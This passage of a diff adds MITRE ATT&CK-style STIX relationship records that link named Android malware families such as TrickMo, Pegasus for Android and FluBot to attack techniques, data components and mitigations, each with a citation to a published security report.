"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7e8956e3-7d90-412d-a82f-d61e43239923", + "created": "2023-03-20T18:44:01.387Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:01.387Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b356d405-f6b1-485b-bd35-236b9da766d2", + "type": "relationship", + "created": "2020-04-24T17:46:31.586Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-27T15:27:26.539Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can use the `MediaRecorder` class to record the screen when the targeted application is presented to the user, and can abuse accessibility features to record targeted applications to intercept transaction authorization numbers (TANs) and to scrape on-screen text.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--439d905b-1ad8-461a-ab0d-b2f426cb2c3a", + "created": "2023-03-20T18:53:35.012Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:35.012Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e68feca-083f-40ed-88d8-2b6a3935c949", + "created": "2023-01-18T19:12:11.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:53:38.271Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use the Android `CallScreeningService` to silently block incoming calls.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38634e49-f19e-41bc-bb6d-e711f0cabd91", + "created": "2020-10-29T19:21:23.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:27.975Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can hide its icon and create a shortcut based on the C2 server response.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--93395e61-0d3e-4ea6-9c1b-08d4a04005a0", + "created": "2019-08-07T15:57:13.453Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Riltok](https://attack.mitre.org/software/S0403) can open a fake Google Play screen requesting bank card credentials and mimic the screen of relevant mobile banking apps to request user/bank card details.(Citation: Kaspersky Riltok June 2019)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b536f233-8c43-4671-b8e8-d72a4806946d", + "created": "2022-04-05T17:14:23.789Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:14:23.789Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--526ce88f-ee58-4a55-a1b2-b72e1b5971aa", + "created": "2022-04-01T16:52:36.974Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T16:52:36.974Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--82f04b1e-5371-4a6f-be06-411f0f43b483", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--86e3c37c-1e4a-450c-850b-c80be8156fe3", + "type": "relationship", + "created": "2020-05-04T14:04:56.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.081Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) collects the device’s IMEI, carrier, mobile country code, and mobile network code.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--19df76ee-fa85-43cf-96ce-422d46f29a13", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:12:48.998Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) listens for the `BOOT_COMPLETED` broadcast intent in order to maintain persistence and activate its functionality at device boot time.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b838636-bfa4-4592-b72f-3044946b8187", + "created": "2020-09-14T14:13:45.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:53:16.656Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can exfiltrate the device’s contact list.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1218ed50-bd44-4f37-baba-1aae998b5a1f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:17:40.860Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) can remotely lock infected Android devices and ask for a ransom.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cccb708-b51b-4e71-94a1-78d6819eaac1", + "created": "2023-03-20T15:16:19.428Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:19.428Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--465b7a4a-32d5-475c-9fb9-6335c44fb0d1", + "created": "2022-04-05T19:48:31.354Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:48:31.354Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a3f36e9e-e2f4-4745-a9a3-0d1231db116d", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.183Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can download executable code from the C2 server after the implant starts or after a specific command.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--535d2425-21aa-4fe5-ae6d-5b677f459020", + "created": "2022-03-28T19:41:37.162Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches for devices that were compromised at the supply chain level.", + "modified": "2022-03-28T19:41:37.162Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0330db55-06e0-45a2-85a6-17617a37fdaf", + "created": "2022-04-06T13:57:49.186Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:49.186Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b", + "type": "relationship", + "created": "2020-12-24T22:04:27.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.914Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has looked for .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files on external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d66a3e5f-700e-40d0-b16a-bbb3306256c7", + "created": "2023-03-20T15:16:28.177Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:28.177Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576", + "type": "relationship", + "created": "2020-09-14T14:13:45.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T15:39:17.961Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s Android version is distributed in three stages: the dropper, the second stage payload, and the third stage payload which is [Exodus](https://attack.mitre.org/software/S0405).(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e0f58ab7-b246-4c41-9afc-89b582590809", + "type": "relationship", + "created": "2020-12-18T20:14:47.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.374Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can download additional modules at runtime via JavaScript `eval` statements.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ba30703-c3aa-425a-9482-9e9941fd7038", + "type": "relationship", + "created": "2020-12-24T21:45:56.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.961Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access the camera on the device.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308", + "created": "2023-02-06T19:04:33.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:06:11.934Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can monitor notifications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9caf7cd5-fa15-45f0-8e1e-75917ea33af2", + "created": "2023-03-20T18:50:32.580Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:32.580Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc24804-42db-4be1-a418-7f5ab9de453c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) has the capability to exploit systems on an enterprise network.(Citation: Lookout-NotCompatible)", + "relationship_type": "uses", + "source_ref": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e7b33eb5-6c2e-4743-ac8d-c27d5e7121ac", + "created": "2020-06-26T15:32:25.060Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:13.005Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can uninstall itself from a device on command.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e889782a-f66b-448e-a466-e55b1bce7b64", + "created": "2023-02-28T20:38:25.598Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:38:25.598Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) has encrypted C2 message bodies with RSA and encoded them in base64.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--481e5d33-eca4-453c-9fec-27ee01d50989", + "created": "2023-02-28T21:45:41.365Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:26:12.006Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view files and media.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7a50961b-9be4-4042-a6a0-878b612c520e", 